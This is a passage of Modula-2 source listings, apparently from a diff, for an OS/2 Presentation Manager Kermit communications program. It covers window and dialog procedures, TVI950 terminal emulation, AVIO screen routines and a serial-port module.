RETURN 1; + | WM_COMMAND: + WinQueryDlgItemText (hwnd, ID_DIRPATH, 60, ADR (Path)); + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END PathDlgProc; + + + PROCEDURE DirEndDlgProc ['DirEndDlgProc'] ( + (* Process Dialog Box to allow user to cancel directory *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + IF msg = WM_COMMAND THEN + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END DirEndDlgProc; + + + PROCEDURE HelpDlgProc ['HelpDlgProc'] ( + (* Process Dialog Boxes for the HELP *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + BEGIN + IF msg = WM_COMMAND THEN + WinDismissDlg (hwnd, 1); + RETURN 0; + ELSE + RETURN WinDefDlgProc (hwnd, msg, mp1, mp2); + END; + END HelpDlgProc; + + + PROCEDURE KeyTranslate (mp1, mp2 : MPARAM; VAR c1, c2 : CHAR) : BOOLEAN; + (* Translates WM_CHAR message into ascii keystroke *) + + VAR + code : CARDINAL; + fs : BITSET; + VK, KU, CH, CT : BOOLEAN; + + BEGIN + fs := BITSET (LOWORD (mp1)); (* flags *) + VK := (fs * BITSET (KC_VIRTUALKEY)) # {}; + KU := (fs * BITSET (KC_KEYUP)) # {}; + CH := (fs * BITSET (KC_CHAR)) # {}; + CT := (fs * BITSET (KC_CTRL)) # {}; + IF (NOT KU) THEN + code := LOWORD (mp2); (* character code *) + c1 := CHR (code); + c2 := CHR (code DIV 256); + IF ORD (c1) = 0E0H THEN (* function *) + c1 := 0C; + END; + IF CT AND (NOT CH) AND (NOT VK) AND (code # 0) THEN + c1 := CHR (CARDINAL ((BITSET (ORD (c1)) * BITSET (1FH)))); + END; + RETURN TRUE; + ELSE + RETURN FALSE; + END; + END KeyTranslate; + + + PROCEDURE WindowProc ['WindowProc'] ( + (* Main Window Procedure -- Handles message from PM and elsewhere *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + + VAR + ch : CHAR; + hps : HPS; + pswp : PSWP; + c1, c2 : CHAR; + + BEGIN + CASE msg OF + WM_HELP: + IF TermMode THEN + WinDlgBox (HWND_DESKTOP, hwnd, HelpDlgProc, + 0, IDM_TERMHELP, 0); + ELSE + WinDlgBox (HWND_DESKTOP, hwnd, HelpDlgProc, + 0, IDM_HELPMENU, 0); + END; + RETURN 0; + | WM_SETFULL: + SetFull; + RETURN 0; + | WM_SETRESTORE: + SetRestore; + RETURN 0; + | WM_SETMAX: + SetMax; + RETURN 0; + | WM_MINMAXFRAME: + pswp := PSWP (mp1); + IF BITSET (pswp^.fs) * BITSET (SWP_MINIMIZE) # {} THEN + (* Don't Display Port Settings While Minimized *) + WinSetWindowText (FrameWindow, ADR (Title)); + ELSE + WinSetWindowText (FrameWindow, ADR (Banner)); + IF TermMode AND + (BITSET (pswp^.fs) * BITSET (SWP_RESTORE) # {}) THEN + (* Force window to be maximized in terminal mode *) + WinPostMsg (FrameWindow, WM_SETMAX, 0, 0); + ELSIF (NOT TermMode) AND + (BITSET (pswp^.fs) * BITSET (SWP_MAXIMIZE) # {}) THEN + (* Prevent maximized window EXCEPT in terminal mode *) + WinPostMsg (FrameWindow, WM_SETRESTORE, 0, 0); + ELSE + (* Do Nothing *) + END; + END; + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + | WM_CREATE: + hdc := WinOpenWindowDC (hwnd); + VioCreatePS (frame_hvps, 25, 80, 0, FORMAT_CGA, 0); + VioCreatePS (child_hvps, 16, 40, 0, FORMAT_CGA, 0); + DosCreateThread (TermThrProc, TermThr, ADR (TermStack[STKSIZE])); + DosSuspendThread (TermThr); + RETURN 0; + | WM_INITMENU: + Check (ColorSet); + RETURN 0; + | WM_COMMAND: + DoMenu (hwnd, mp1); + RETURN 0; + | WM_TERMQUIT: + TermMode := FALSE; + DosSuspendThread (TermThr); + VioAssociate (0, hvps); + (* Restore The Window *) + SetRestore; + Enable (IDM_CONNECT); + Enable (IDM_SEND); + Enable (IDM_REC); + Enable (IDM_DIR); + Enable (IDM_OPTIONS); + Enable (IDM_COLORS); + RETURN 0; + | WM_TERM: + PutPortChar (CHR (LOWORD (mp1))); (* To Screen *) + RETURN 0; + | WM_CHAR: + IF TermMode THEN + IF KeyTranslate (mp1, mp2, c1, c2) THEN + PutKbdChar (c1, c2); (* To Port *) + RETURN 0; + ELSE + RETURN WinDefAVioWindowProc (hwnd, msg, mp1, mp2); + END; + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + | WM_PAINT: + hps := WinBeginPaint (hwnd, NULL, ADDRESS (NULL)); + GpiErase (hps); + VioShowPS (25, 80, 0, hvps); + WinEndPaint (hps); + RETURN 0; + | WM_SIZE: + IF TermMode THEN + RETURN WinDefAVioWindowProc (hwnd, msg, mp1, mp2); + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + | WM_DESTROY: + VioDestroyPS (frame_hvps); + VioDestroyPS (child_hvps); + RETURN 0; + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + END WindowProc; + + + PROCEDURE ChildWindowProc ['ChildWindowProc'] ( + (* Window Procedure for Send/Receive child windows *) + hwnd : HWND; + msg : USHORT; + mp1 : MPARAM; + mp2 : MPARAM) : MRESULT [LONG, LOADDS]; + + VAR + mp : USHORT; + hps : HPS; + c1, c2 : CHAR; + + BEGIN + CASE msg OF + WM_PAINT: + hps := WinBeginPaint (hwnd, NULL, ADDRESS (NULL)); + GpiErase (hps); + VioShowPS (16, 40, 0, hvps); + WinEndPaint (hps); + RETURN 0; + | WM_CHAR: + IF KeyTranslate (mp1, mp2, c1, c2) AND (c1 = ESC) THEN + Aborted := TRUE; + RETURN 0; + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + | WM_PAD: + mp := LOWORD (mp1); + IF (mp = PAD_Error) OR (mp = PAD_Quit) THEN + WriteLn; + IF mp = PAD_Error THEN + WinMessageBox (HWND_DESKTOP, hwnd, + ADR ("File Transfer Aborted"), + ADR (Class), 0, MB_OK + MB_ICONEXCLAMATION); + ELSE + WinMessageBox (HWND_DESKTOP, hwnd, + ADR ("File Transfer Completed"), + ADR (Class), 0, MB_OK + MB_ICONASTERISK); + END; + DosSleep (2000); + VioAssociate (0, hvps); + WinDestroyWindow(ChildFrameWindow); + Enable (IDM_CONNECT); + Enable (IDM_SEND); + Enable (IDM_REC); + Enable (IDM_DIR); + Enable (IDM_OPTIONS); + Enable (IDM_COLORS); + ELSE + DoPADMsg (mp1, mp2); + END; + RETURN 0; + | WM_DL: + DoDLMsg (mp1, mp2); + RETURN 0; + | WM_SIZE: + WinSetWindowPos (ChildFrameWindow, 0, + Pos.cx DIV 4, Pos.cy DIV 4, + Pos.cx DIV 2, Pos.cy DIV 2 - 3, + SWP_MOVE + SWP_SIZE); + RETURN WinDefAVioWindowProc (hwnd, msg, mp1, mp2); + ELSE + RETURN WinDefWindowProc (hwnd, msg, mp1, mp2); + END; + END ChildWindowProc; + + +BEGIN (* Module Initialization *) + WITH Settings[ID_COM1 - COM_OFF] DO + baudrate := ID_B1200; + parity := ID_EVEN; + databits := ID_DATA7; + stopbits := ID_STOP1; + END; + + WITH Settings[ID_COM2 - COM_OFF] DO + baudrate := ID_B19K2; + parity := ID_EVEN; + databits := ID_DATA7; + stopbits := ID_STOP1; + END; + PrevComPort := NONE; + comport := ID_COM1; + TermMode := FALSE; (* Not Initially in Terminal Emulation Mode *) +END Shell. + + + +[LISTING TEN] + +IMPLEMENTATION MODULE Term; (* TVI950 Terminal Emulation for Kermit *) + + FROM Drives IMPORT + SetDrive; + + FROM Directories IMPORT + FileAttributes, AttributeSet, DirectoryEntry, FindFirst, FindNext; + + FROM SYSTEM IMPORT + ADR; + + FROM OS2DEF IMPORT + ULONG; + + FROM DosCalls IMPORT + DosChDir, DosSleep; + + FROM Screen IMPORT + ClrScr, ClrEol, GotoXY, GetXY, + Right, Left, Up, Down, WriteAtt, WriteString, WriteLn, Write, + attribute, NORMAL, HIGHLIGHT, REVERSE; + + FROM PMWIN IMPORT + WinPostMsg, MPFROM2SHORT; + + FROM Shell IMPORT + comport, FrameWindow; + + FROM KH IMPORT + COM_OFF; + + FROM CommPort IMPORT + CommStatus, GetChar, SendChar; + + FROM Strings IMPORT + Length, Concat; + + IMPORT ASCII; + + + CONST + (* Key codes: Note: F1 -- F12 are actually Shift-F1 -- Shift-F12 *) + F1 = 124C; + F2 = 125C; + F3 = 126C; + F4 = 127C; + F5 = 130C; + F6 = 131C; + F7 = 132C; + F8 = 133C; + F9 = 134C; + F10 = 135C; + F11 = 207C; + F12 = 210C; + AF1 = 213C; (* Alt-F1 *) + AF2 = 214C; (* Alt-F2 *) + INS = 122C; + DEL = 123C; + HOME = 107C; + PGDN = 121C; (* synonym for PF10 *) + PGUP = 111C; (* synonym for PF11 *) + ENDD = 117C; (* synonym for PF12 *) + UPARROW = 110C; + DOWNARROW = 120C; + LEFTARROW = 113C; + RIGHTARROW = 115C; + CtrlX = 30C; + CtrlCaret = 36C; + CtrlZ = 32C; + CtrlL = 14C; + CtrlH = 10C; + CtrlK = 13C; + CtrlJ = 12C; + CtrlV = 26C; + ESC = 33C; + BUFSIZE = 4096; (* character buffer used by term thread *) + + + VAR + commStat : CommStatus; + echo : (Off, Local, On); + newline: BOOLEAN; (* translate to *) + Insert : BOOLEAN; + + + PROCEDURE Dir (path : ARRAY OF CHAR); + (* Change drive and/or directory; display a directory (in wide format) *) + + VAR + gotFN : BOOLEAN; + filename : ARRAY [0..20] OF CHAR; + attr : AttributeSet; + ent : DirectoryEntry; + i, j, k : INTEGER; + + BEGIN + filename := ""; (* in case no directory change *) + i := Length (path); + IF (i > 2) AND (path[1] = ':') THEN (* drive specifier *) + DEC (i, 2); + SetDrive (ORD (CAP (path[0])) - ORD ('A')); + FOR j := 0 TO i DO (* strip off the drive specifier *) + path[j] := path[j + 2]; + END; + END; + IF i # 0 THEN + gotFN := FALSE; + WHILE (i >= 0) AND (path[i] # '\') DO + IF path[i] = '.' THEN + gotFN := TRUE; + END; + DEC (i); + END; + IF gotFN THEN + j := i + 1; + k := 0; + WHILE path[j] # 0C DO + filename[k] := path[j]; + INC (k); INC (j); + END; + filename[k] := 0C; + IF (i = -1) OR ((i = 0) AND (path[0] = '\')) THEN + INC (i); + END; + path[i] := 0C; + END; + END; + IF Length (path) # 0 THEN + DosChDir (ADR (path), 0); + END; + IF Length (filename) = 0 THEN + filename := "*.*"; + END; + attr := AttributeSet {ReadOnly, Directory, Archive}; + i := 1; (* keep track of position on line *) + + ClrScr; + gotFN := FindFirst (filename, attr, ent); + WHILE gotFN DO + WriteString (ent.name); + j := Length (ent.name); + WHILE j < 12 DO (* 12 is maximum length for "filename.typ" *) + Write (' '); + INC (j); + END; + INC (i); (* next position on this line *) + IF i > 5 THEN + i := 1; (* start again on new line *) + WriteLn; + ELSE + WriteString (" | "); + END; + gotFN := FindNext (ent); + END; + WriteLn; + END Dir; + + + PROCEDURE InitTerm; + (* Clear Screen, Home Cursor, Get Ready For Terminal Emulation *) + BEGIN + ClrScr; + Insert := FALSE; + attribute := NORMAL; + END InitTerm; + + + PROCEDURE PutKbdChar (ch1, ch2 : CHAR); + (* Process a character received from the keyboard *) + BEGIN + IF ch1 = ASCII.enq THEN (* Control-E *) + echo := On; + ELSIF ch1 = ASCII.ff THEN (* Control-L *) + echo := Local; + ELSIF ch1 = ASCII.dc4 THEN (* Control-T *) + echo := Off; + ELSIF ch1 = ASCII.so THEN (* Control-N *) + newline := TRUE; + ELSIF ch1 = ASCII.si THEN (* Control-O *) + newline := FALSE; + ELSIF (ch1 = ASCII.can) OR (ch1 = ESC) THEN + attribute := NORMAL; + WinPostMsg (FrameWindow, WM_TERMQUIT, 0, 0); + ELSIF ch1 = 0C THEN + Function (ch2); + ELSE + commStat := SendChar (comport - COM_OFF, ch1, FALSE); + IF (echo = On) OR (echo = Local) THEN + WriteAtt (ch1); + END; + END; + END PutKbdChar; + + + PROCEDURE Function (ch : CHAR); + (* handles the function keys -- including PF1 - PF12, etc. *) + BEGIN + CASE ch OF + F1 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, '@', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F2 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'A', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F3 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'B', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F4 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'C', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F5 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'D', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F6 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'E', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F7 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'F', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F8 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'G', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F9 : commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'H', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F10, + PGDN: commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'I', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F11, + AF1, + PGUP: commStat := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + commStat := SendChar (comport - COM_OFF, 'J', FALSE); + commStat := SendChar (comport - COM_OFF, ASCII.cr, FALSE); + | F12, + AF2, + ENDD: commStat := SendChar (comport - COM_OFF, ESC, FALSE); + commStat := SendChar (comport - COM_OFF, 'Q', FALSE); + | INS : IF NOT Insert THEN + commStat := SendChar (comport - COM_OFF, ESC, FALSE); + commStat := SendChar (comport - COM_OFF, 'E', FALSE); + END; + | DEL : commStat := SendChar (comport - COM_OFF, ESC, FALSE); + commStat := SendChar (comport - COM_OFF, 'R', FALSE); + | HOME : commStat := SendChar (comport - COM_OFF, CtrlZ, FALSE); + | UPARROW : commStat := SendChar (comport - COM_OFF, CtrlK, FALSE); + | DOWNARROW : commStat := SendChar (comport - COM_OFF, CtrlV, FALSE); + | LEFTARROW : commStat := SendChar (comport - COM_OFF, CtrlH, FALSE); + | RIGHTARROW : commStat := SendChar (comport - COM_OFF, CtrlL, FALSE); + ELSE + (* do nothing *) + END; + END Function; + + + PROCEDURE TermThrProc; + (* Thread to get characters from port, put into buffer *) + + VAR + ch : CHAR; + + BEGIN + LOOP + IF GetChar (comport - COM_OFF, ch) = Success THEN + WinPostMsg (FrameWindow, WM_TERM, MPFROM2SHORT (ORD (ch), 0), 0); + ELSE + DosSleep (0); + END + END; + END TermThrProc; + + + VAR + EscState, CurState1, CurState2 : BOOLEAN; + CurChar1 : CHAR; + + PROCEDURE PutPortChar (ch : CHAR); + (* Process a character received from the port *) + BEGIN + IF EscState THEN + EscState := FALSE; + IF ch = '=' THEN + CurState1 := TRUE; + ELSE + Escape (ch); + END; + ELSIF CurState1 THEN + CurState1 := FALSE; + CurChar1 := ch; + CurState2 := TRUE; + ELSIF CurState2 THEN + CurState2 := FALSE; + Cursor (ch); + ELSE + CASE ch OF + CtrlCaret, CtrlZ : ClrScr; + | CtrlL : Right; + | CtrlH : Left; + | CtrlK : Up; + | CtrlJ : Down; + | ESC : EscState := TRUE; + ELSE + WriteAtt (ch); + IF newline AND (ch = ASCII.cr) THEN + WriteLn; + END; + END; + END; + IF echo = On THEN + commStat := SendChar (comport - COM_OFF, ch, FALSE); + END; + END PutPortChar; + + + PROCEDURE Escape (ch : CHAR); + (* handles escape sequences *) + BEGIN + CASE ch OF + '*' : ClrScr; + | 'T', 'R' : ClrEol; + | ')' : attribute := NORMAL; + | '(' : attribute := HIGHLIGHT; + | 'f' : InsertMsg; + | 'g' : InsertOn; + ELSE + (* ignore *) + END; + END Escape; + + + PROCEDURE Cursor (ch : CHAR); + (* handles cursor positioning *) + + VAR + x, y : CARDINAL; + + BEGIN + y := ORD (CurChar1) - 20H; + x := ORD (ch) - 20H; + GotoXY (x, y); (* adjust for HOME = (1, 1) *) + END Cursor; + + + VAR + cx, cy : CARDINAL; + + PROCEDURE InsertMsg; + (* get ready insert mode -- place a message at the bottom of the screen *) + BEGIN + IF NOT Insert THEN + GetXY (cx, cy); (* record current position *) + GotoXY (1, 24); + ClrEol; + attribute := REVERSE; + ELSE (* exit Insert mode *) + GetXY (cx, cy); + GotoXY (1, 24); + ClrEol; + GotoXY (cx, cy); + Insert := FALSE; + END; + END InsertMsg; + + + PROCEDURE InsertOn; + (* enter insert mode -- after INSERT MODE message is printed *) + BEGIN + attribute := NORMAL; + GotoXY (cx, cy); + Insert := TRUE; + END InsertOn; + + +BEGIN (* module initialization *) + echo := Off; + newline := FALSE; + Insert := FALSE; + EscState := FALSE; + CurState1 := FALSE; + CurState2 := FALSE; +END Term. + + +[LISTING ELEVEN] + +IMPLEMENTATION MODULE Screen; +(* module to perform "low level" screen functions (via AVIO) *) + + IMPORT ASCII; + + FROM SYSTEM IMPORT + ADR; + + FROM Strings IMPORT + Length; + + FROM Conversions IMPORT + IntToString; + + FROM KH IMPORT + IDM_GREEN; + + FROM Vio IMPORT + VioSetCurPos, VioGetCurPos, VioScrollUp, + VioWrtNCell, VioWrtTTY, VioCell; + + + CONST + GREY = 07H; + WHITE = 0FH; + REV_GY = 70H; + GREEN = 02H; + LITE_GRN = 0AH; + REV_GRN = 20H; + AMBER = 06H; + LITE_AMB = 0EH; + REV_AMB = 60H; + RED = 0CH; + CY_BK = 0B0H; + CY_BL = 0B9H; + REV_RD = 0CFH; + REV_BL = 9FH; + MAGENTA = 05H; + + + VAR + (* From Definition Module + NORMAL : CARDINAL; + HIGHLIGHT : CARDINAL; + REVERSE : CARDINAL; + attribute : CARDINAL; + hvps : HVPS; + *) + x, y : CARDINAL; + bCell : VioCell; + + + PROCEDURE White; + (* Sets up colors: Monochrome White *) + BEGIN + NORMAL := GREY; + HIGHLIGHT := WHITE; + REVERSE := REV_GY; + attribute := NORMAL; + END White; + + + PROCEDURE Green; + (* Sets up colors: Monochrome Green *) + BEGIN + NORMAL := GREEN; + HIGHLIGHT := LITE_GRN; + REVERSE := REV_GRN; + attribute := NORMAL; + END Green; + + + PROCEDURE Amber; + (* Sets up colors: Monochrome Amber *) + BEGIN + NORMAL := AMBER; + HIGHLIGHT := LITE_AMB; + REVERSE := REV_AMB; + attribute := NORMAL; + END Amber; + + + PROCEDURE Color1; + (* Sets up colors: Blue, Red, Green *) + BEGIN + NORMAL := GREEN; + HIGHLIGHT := RED; + REVERSE := REV_BL; + attribute := NORMAL; + END Color1; + + + PROCEDURE Color2; + (* Sets up colors: Cyan Background; Black, Blue, White-on-Red *) + BEGIN + NORMAL := CY_BK; + HIGHLIGHT := CY_BL; + REVERSE := REV_RD; + attribute := NORMAL; + END Color2; + + + PROCEDURE HexToString (num : INTEGER; + size : CARDINAL; + VAR buf : ARRAY OF CHAR; + VAR I : CARDINAL; + VAR Done : BOOLEAN); + (* Local Procedure to convert a number to a string, represented in HEX *) + + CONST + ZERO = 30H; (* ASCII code *) + A = 41H; + + VAR + i : CARDINAL; + h : CARDINAL; + t : ARRAY [0..10] OF CHAR; + + BEGIN + i := 0; + REPEAT + h := num MOD 16; + IF h <= 9 THEN + t[i] := CHR (h + ZERO); + ELSE + t[i] := CHR (h - 10 + A); + END; + INC (i); + num := num DIV 16; + UNTIL num = 0; + + IF (size > HIGH (buf)) OR (i > HIGH (buf)) THEN + Done := FALSE; + RETURN; + ELSE + Done := TRUE; + END; + + WHILE size > i DO + buf[I] := '0'; (* pad with zeros *) + DEC (size); + INC (I); + END; + + WHILE i > 0 DO + DEC (i); + buf[I] := t[i]; + INC (I); + END; + + buf[I] := 0C; + END HexToString; + + + PROCEDURE ClrScr; + (* Clear the screen, and home the cursor *) + BEGIN + bCell.ch := ' '; (* space = blank screen *) + bCell.attr := CHR (NORMAL); (* Normal Video Attribute *) + VioScrollUp (0, 0, 24, 79, 25, bCell, hvps); + GotoXY (0, 0); + END ClrScr; + + + + PROCEDURE ClrEol; + (* clear from the current cursor position to the end of the line *) + BEGIN + GetXY (x, y); (* current cursor position *) + bCell.ch := ' '; (* space = blank *) + bCell.attr := CHR (NORMAL); (* Normal Video Attribute *) + VioScrollUp (y, x, y, 79, 1, bCell, hvps); + END ClrEol; + + + PROCEDURE Right; + (* move cursor to the right *) + BEGIN + GetXY (x, y); + INC (x); + GotoXY (x, y); + END Right; + + + PROCEDURE Left; + (* move cursor to the left *) + BEGIN + GetXY (x, y); + DEC (x); + GotoXY (x, y); + END Left; + + + PROCEDURE Up; + (* move cursor up *) + BEGIN + GetXY (x, y); + DEC (y); + GotoXY (x, y); + END Up; + + + PROCEDURE Down; + (* move cursor down *) + BEGIN + GetXY (x, y); + INC (y); + GotoXY (x, y); + END Down; + + + PROCEDURE GotoXY (col, row : CARDINAL); + (* position cursor at column, row *) + BEGIN + IF (col <= 79) AND (row <= 24) THEN + VioSetCurPos (row, col, hvps); + END; + END GotoXY; + + + PROCEDURE GetXY (VAR col, row : CARDINAL); + (* determine current cursor position *) + BEGIN + VioGetCurPos (row, col, hvps); + END GetXY; + + + PROCEDURE Write (c : CHAR); + (* Write a Character *) + BEGIN + WriteAtt (c); + END Write; + + + PROCEDURE WriteString (str : ARRAY OF CHAR); + (* Write String *) + + VAR + i : CARDINAL; + c : CHAR; + + BEGIN + i := 0; + c := str[i]; + WHILE c # 0C DO + Write (c); + INC (i); + c := str[i]; + END; + END WriteString; + + + PROCEDURE WriteInt (n : INTEGER; s : CARDINAL); + (* Write Integer *) + + VAR + i : CARDINAL; + b : BOOLEAN; + str : ARRAY [0..6] OF CHAR; + + BEGIN + i := 0; + IntToString (n, s, str, i, b); + WriteString (str); + END WriteInt; + + + PROCEDURE WriteHex (n, s : CARDINAL); + (* Write a Hexadecimal Number *) + + VAR + i : CARDINAL; + b : BOOLEAN; + str : ARRAY [0..6] OF CHAR; + + BEGIN + i := 0; + HexToString (n, s, str, i, b); + WriteString (str); + END WriteHex; + + + PROCEDURE WriteLn; + (* Write *) + BEGIN + Write (ASCII.cr); Write (ASCII.lf); + END WriteLn; + + + PROCEDURE WriteAtt (c : CHAR); + (* write character and attribute at cursor position *) + + VAR + s : ARRAY [0..1] OF CHAR; + + BEGIN + GetXY (x, y); + IF (c = ASCII.ht) THEN + bCell.ch := ' '; + bCell.attr := CHR (attribute); + REPEAT + VioWrtNCell (bCell, 1, y, x, hvps); + Right; + UNTIL (x MOD 8) = 0; + ELSIF (c = ASCII.cr) OR (c = ASCII.lf) + OR (c = ASCII.bel) OR (c = ASCII.bs) THEN + s[0] := c; s[1] := 0C; + VioWrtTTY (ADR (s), 1, hvps); + IF c = ASCII.lf THEN + ClrEol; + END; + ELSE + bCell.ch := c; + bCell.attr := CHR (attribute); + VioWrtNCell (bCell, 1, y, x, hvps); + Right; + END; + END WriteAtt; + +BEGIN (* module initialization *) + ColorSet := IDM_GREEN; + NORMAL := GREEN; + HIGHLIGHT := LITE_GRN; + REVERSE := REV_GRN; + attribute := NORMAL; +END Screen. + + + +[LISTING TWELVE] + +(**************************************************************************) +(* *) +(* Copyright (c) 1988, 1989 *) +(* by Stony Brook Software *) +(* and *) +(* Copyright (c) 1990 *) +(* by Brian R. Anderson *) +(* All rights reserved. *) +(* *) +(**************************************************************************) + +IMPLEMENTATION MODULE CommPort [7]; + + FROM SYSTEM IMPORT + ADR, BYTE, WORD, ADDRESS; + + FROM Storage IMPORT + ALLOCATE, DEALLOCATE; + + FROM DosCalls IMPORT + DosOpen, AttributeSet, DosDevIOCtl, DosClose, DosRead, DosWrite; + + + TYPE + CP = POINTER TO CHAR; + + VAR + pn : CARDINAL; + Handle : ARRAY [0..3] OF CARDINAL; + BufIn : ARRAY [0..3] OF CP; + BufOut : ARRAY [0..3] OF CP; + BufStart : ARRAY [0..3] OF CP; + BufLimit : ARRAY [0..3] OF CP; + BufSize : ARRAY [0..3] OF CARDINAL; + Temp : ARRAY [1..1024] OF CHAR; (* size of OS/2's serial queue *) + + + PROCEDURE CheckPort (portnum : CARDINAL) : BOOLEAN; + (* Check for a valid port number and open the port if it not alredy open *) + + CONST + PortName : ARRAY [0..3] OF ARRAY [0..4] OF CHAR = + [['COM1', 0C], ['COM2', 0C], ['COM3', 0C], ['COM4', 0C]]; + + VAR + Action : CARDINAL; + + BEGIN + (* check the port number *) + IF portnum > 3 THEN + RETURN FALSE; + END; + + (* attempt to open the port if it is not already open *) + IF Handle[portnum] = 0 THEN + IF DosOpen(ADR(PortName[portnum]), Handle[portnum], Action, 0, + AttributeSet{}, 1, 12H, 0) # 0 THEN + RETURN FALSE; + END; + END; + RETURN TRUE; + END CheckPort; + + + + PROCEDURE InitPort (portnum : CARDINAL; speed : BaudRate; data : DataBits; + stop : StopBits; check : Parity) : CommStatus; + (* Initialize a port *) + + CONST + Rate : ARRAY BaudRate OF CARDINAL = + [110, 150, 300, 600, 1200, 2400, 4800, 9600, 19200]; + TransParity : ARRAY Parity OF BYTE = [2, 1, 0]; + + TYPE + LineChar = RECORD + bDataBits : BYTE; + bParity : BYTE; + bStopBits : BYTE; + END; + + VAR + LC : LineChar; + + BEGIN + (* Check the port number *) + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + + (* Set the baud rate *) + IF DosDevIOCtl(0, ADR(Rate[speed]), 41H, 1, Handle[portnum]) # 0 THEN + RETURN InvalidParameter; + END; + + (* set the characteristics *) + LC.bDataBits := BYTE(data); + IF stop = 1 THEN + DEC (stop); (* 0x00 = 1 stop bits; 0x02 = 2 stop bits *) + END; + LC.bStopBits := BYTE(stop); + LC.bParity := TransParity[check]; + + IF DosDevIOCtl(0, ADR(LC), 42H, 1, Handle[portnum]) # 0 THEN + RETURN InvalidParameter; + END; + + RETURN Success; + END InitPort; + + + PROCEDURE StartReceiving (portnum, bufsize : CARDINAL) : CommStatus; + (* Start receiving characters on a port *) + BEGIN + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + IF BufStart[portnum] # NIL THEN + RETURN AlreadyReceiving; + END; + ALLOCATE (BufStart[portnum], bufsize); + BufIn[portnum] := BufStart[portnum]; + BufOut[portnum] := BufStart[portnum]; + BufLimit[portnum] := BufStart[portnum]; + INC (BufLimit[portnum]:ADDRESS, bufsize - 1); + BufSize[portnum] := bufsize; + RETURN Success; + END StartReceiving; + + + PROCEDURE StopReceiving (portnum : CARDINAL) : CommStatus; + (* Stop receiving characters on a port *) + BEGIN + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + IF BufStart[portnum] # NIL THEN + DEALLOCATE (BufStart[portnum], BufSize[portnum]); + BufLimit[portnum] := NIL; + BufIn[portnum] := NIL; + BufOut[portnum] := NIL; + BufSize[portnum] := 0; + END; + DosClose(Handle[portnum]); + Handle[portnum] := 0; + RETURN Success; + END StopReceiving; + + + PROCEDURE GetChar (portnum : CARDINAL; VAR ch : CHAR) : CommStatus; + (* Get a character from the comm port *) + + VAR + status : CARDINAL; + read : CARDINAL; + que : RECORD + ct : CARDINAL; + sz : CARDINAL; + END; + i : CARDINAL; + + BEGIN + IF BufStart[portnum] = NIL THEN + RETURN NotReceiving; + END; + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + status := DosDevIOCtl (ADR (que), 0, 68H, 1, Handle[portnum]); + IF (status = 0) AND (que.ct # 0) THEN + status := DosRead (Handle[portnum], ADR (Temp), que.ct, read); + IF (status # 0) OR (read = 0) THEN + RETURN NotReceiving; + END; + FOR i := 1 TO read DO + BufIn[portnum]^ := Temp[i]; + IF BufIn[portnum] = BufLimit[portnum] THEN + BufIn[portnum] := BufStart[portnum]; + ELSE + INC (BufIn[portnum]:ADDRESS); + END; + IF BufIn[portnum] = BufOut[portnum] THEN + RETURN BufferOverflow; + END; + END; + END; + + IF BufIn[portnum] = BufOut[portnum] THEN + RETURN NoCharacter; + END; + ch := BufOut[portnum]^; + IF BufOut[portnum] = BufLimit[portnum] THEN + BufOut[portnum] := BufStart[portnum]; + ELSE + INC (BufOut[portnum]:ADDRESS); + END; + RETURN Success; + END GetChar; + + + PROCEDURE SendChar (portnum : CARDINAL; ch : CHAR; + modem : BOOLEAN) : CommStatus; + (* send a character to the comm port *) + + VAR + wrote : CARDINAL; + status : CARDINAL; + commSt : CHAR; + + BEGIN + IF NOT CheckPort(portnum) THEN + RETURN InvalidPort; + END; + status := DosDevIOCtl (ADR (commSt), 0, 64H, 1, Handle[portnum]); + IF (status # 0) OR 